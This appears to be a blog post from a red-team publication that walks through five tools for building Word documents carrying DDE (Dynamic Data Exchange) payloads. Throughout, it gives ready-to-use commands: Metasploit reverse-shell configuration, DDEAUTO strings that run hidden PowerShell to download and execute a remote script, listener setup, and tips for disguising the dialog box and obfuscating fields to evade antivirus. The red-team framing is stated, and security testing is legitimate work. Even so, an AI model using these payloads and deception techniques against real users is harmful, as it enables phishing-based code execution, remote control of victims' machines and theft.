DDE Payloads

In October 2017 SensePost released an article which explained how it is possible arbitrary code to be executed from a Microsoft Word document and without using any macros or scripts. The technique that SensePost described was utilising a legitimate Microsoft office functionality which is called DDE (Dynamic Data Exchange). DDE is a protocol which was developed to allow transportation of data between Microsoft office applications.

Since this technique doesn’t infect the Word document with malicious macros that can be detected by email gateways it has the same result as remote code execution can be achieved. This attack is very effective and therefore it is used widely in malware campaigns and red team assessments. The following tools can generate various DDE payloads that could be used during a red team assessment.

  1. Metasploit
  2. Empire
  3. CactusTorch DDE Auto
  4. Office DDE Payload
  5. Unicorn


Metasploit Framework has a module which can be used to deliver attacks via DDE.


This module can generate a Word documents in .doc and .rtf format which will contain a DDE payload. This module can be configured easily with the following parameters.

set payload windows/meterpreter/reverse_tcp
set LPORT 4444
Metasploit DDE Module — Configuration

The benefit of this module is that the DDE payload will be executed by utilising the regsvr32 method to evade AppLocker restrictions and that the dialog box that will appear to the target user will not contain any alarming messages.

DDE payloads will be generated in that form:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c regsvr32 /s /n /u /i: scrobj.dll"

The dialog box that will appear to the user when the malicious word document will open will look legitimate as it will ask the user to start MSword.exe. However this is not a valid path.

Metasploit DDE Module — Word Dialog Box

If the user choose to start the fake MSword.exe the payload will executed and a Meterpreter session will open.

Metasploit DDE Module — Meterpreter

Interaction with the Meterpeter session can start and commands can be executed on the target host.

sessions -i 1
Metasploit DDE Module — Interaction with the Session

Another similar Metasploit module has been developed (even though it is not part of the Metasploit) which can generate DDE payloads in HTA format. However it cannot generate the Word document. This module can be downloaded from the following location.

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Download DDE Delivery Module

In order to load the module with the Metasploit Framework it needs to be moved to a suitable Metasploit directory.

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Move DDE Delivery Module to Metasploit

The Metasploit needs to start and from the console the reload command will load all the modules that exists in the Metasploit directories.

Metasploit Reload Command

This module can be configured like the previous:

use exploit/windows/dde_delivery
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
DDE Delivery Module Configuration

The module will start a server on port 8080 which will contain the arbitrary code and it will generate the DDE payload which needs to be used inside a field of a Word document.

DDE Delivery Module Generation of HTA Payload

The dialog box that will appear to the user upon opening the Word document will be the following:

DDE Delivery Module — Dialog Box

The payload will executed if the user choose the option Yes.

DDE Delivery Module — Payload Delivery


Empire is one of the most popular command and control tools. It provides a stager which can generate Word documents with embedded DDE payloads. A listener needs to be configured first that will accept the connection.

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!
Empire — Listener Configuration

The command execute will start the listener.

Empire — Listener Started

The list of active listeners can be obtained with the listeners command.

Empire — List of Active Listeners

The stager that can replicate the DDE attack is the following:

usestager windows/macroless_msword http
Empire — Macroless Stager

Upon execution the stager will use the active listener and it will create a PowerShell script that will contain the arbitrary code and finally it will generate the Word document in .docx format that will have embedded the DDE payload.

Empire — Macroless Stager Word Generation

The DDE payload that the Empire stager generates would be the following.

DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -e $e "

The default.ps1 PowerShell script needs to be hosted on a web server. Since port 80 is already occupied by the listener another port needs to be used. In python the following command will start a web server on port 8000.

python -m SimpleHTTPServer
Python — HTTP Server

The DDE payload that Empire is using will produce the following dialog box in Microsoft Word.

Empire — Dialog Box

The Yes option will trigger the payload and the Empire listener will receive the connection.

Empire — Agents via Macroless Stager

CactusTorch DDE Auto

William Genovese developed a bash script called CactusTorch DDE Auto which utilises CactusTorch tool for generation of payloads and Metasploit Framework for configuration of the listener that will receive the connection.

chmod +x cactus.sh
CactusTorch DDE Auto — IP Usage

CactusTorch DDE Auto will retrieve automatically the internal and the external IP address of the host. The script only needs three parameters to automate the attack:

  1. IP
  2. Port
  3. Payload
CactusTorch DDE Auto — Configuration

Once the configuration is finished the script will generate a base64 payload in various formats, move the payload files into an Apache directory and start the service.

CactusTorch DDE Auto — Generation of Shellcode

CactusTorch DDE Auto can generate payloads in JS, VBS and HTA format.

CactusTorch DDE Auto — DDE Payloads

The dialog box that will appear upon opening the Word document with the DDE payload will be the following:

CactusTorch DDE Auto — Word Dialog Box

The payloads will be executed through the command prompt if the user choice is Yes. Unfortunately the script doesn’t perform any obfuscation on the payload or in the dialog box, making it easier for the target user and blue team to detect the suspicious activity.

CactusTorch DDE Auto — Meterpreter

Office DDE Payload

Dominic Spinosa developed a python script which can generate office Word documents that can utilize various methods such as:

  1. Word with DDE payload
  2. Word with DDE frameset
  3. Word with obfuscated DDE

These methods have been described in detail here. Prior to any execution of the script dependencies must be installed:

pip install -r requirements.txt
Office DDE Payloads — Install Dependencies

It is up to the red teamer to decide which payload to use and which method in order to assist in evasion. This script can be combined with the following Metasploit module:

Office DDE Payload s— Generate Command

The script upon execution it will require from the user to insert the DDE payload of his choice in three parts. Furthermore it will ask the user to enter the URL of the server that the payload word document will be hosted in order to construct the DDE attack via frameset on the template document.

Office DDE Payloads — Generate Payload and Template

There are two delivery methods of this attack. One is to send the payload-final.docx directly to the target user and by setting a listener to obtain a meterpeter session and the other to host the payload-final.docx on a web server and use frameset to create a reference on another Word document that contains the DDE. The frameset would be injected inside of the webSettings.xml file.

Office DDE Payloads — Frameset

The office dde payloads will create and the webSettings.xml.rels file that will contain the link of where the Word document that contains the DDE is hosted.

Office DDE Payloads — Target relationship

When the target opens the template document that contains the frameset the following dialog box will appear:

Office DDE Payloads — 1st Dialog Box

The second dialog box will execute the arbitrary payload if the option Yes is chosen by the user:

Office DDE Payloads — 2nd Dialog Box

The listener that was set by the module will receive the connection and a Meterpreter session will open.

Office DDE Payloads — Meterpreter


Dave Kennedy has imported the DDE attack into unicorn which is a tool that can inject shellcode into memory by using the PowerShell downgrade attack. Executing unicorn with the following parameters will generate the shellcode payload:

python unicorn.py windows/meterpreter/reverse_tcp 4444 dde
Unicorn — Shellcode Generation

Unicorn will automatically generate various files:

  1. powershell_attack.txt // DDE Payload
  2. unicorn.rc // Metasploit listener configuration
  3. download.ps1 // Shellcode

Running the unicorn.rc will initiate the Metasploit handler with the appropriate configuration.

msfconsole -r unicorn.rc
Unicorn — Metasploit Listener Configuration

Unicorn uses the field code obfuscation similar to Office DDE Payloads tool in order to avoid detection. The DDE payload generated by unicorn will look similar to the below:

Unicorn — DDE Payload Obfuscation

The download.ps1 PowerShell script needs to be hosted on a server so when the document is opened it will try to execute the payload. The Word dialog box that will appear to the user will inform him that an Add-On is not accessible and to start Word instead making the dialog box more sophisticated.

Unicorn — Word Dialog Box


Antivirus companies have made progress and they are trying to detect DDE attacks. Therefore obfuscation is necessary for the construction of a payload that has higher possibility to evade detection and establish an initial footprint in the network.

The following table summarises the list of DDE tools and their features.

DDE Payloads — Table

Red Team

Stories for red team assessments

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store